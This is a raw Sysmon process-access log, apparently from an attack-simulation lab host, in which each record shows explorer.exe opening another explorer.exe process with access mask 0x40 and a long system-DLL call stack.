22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 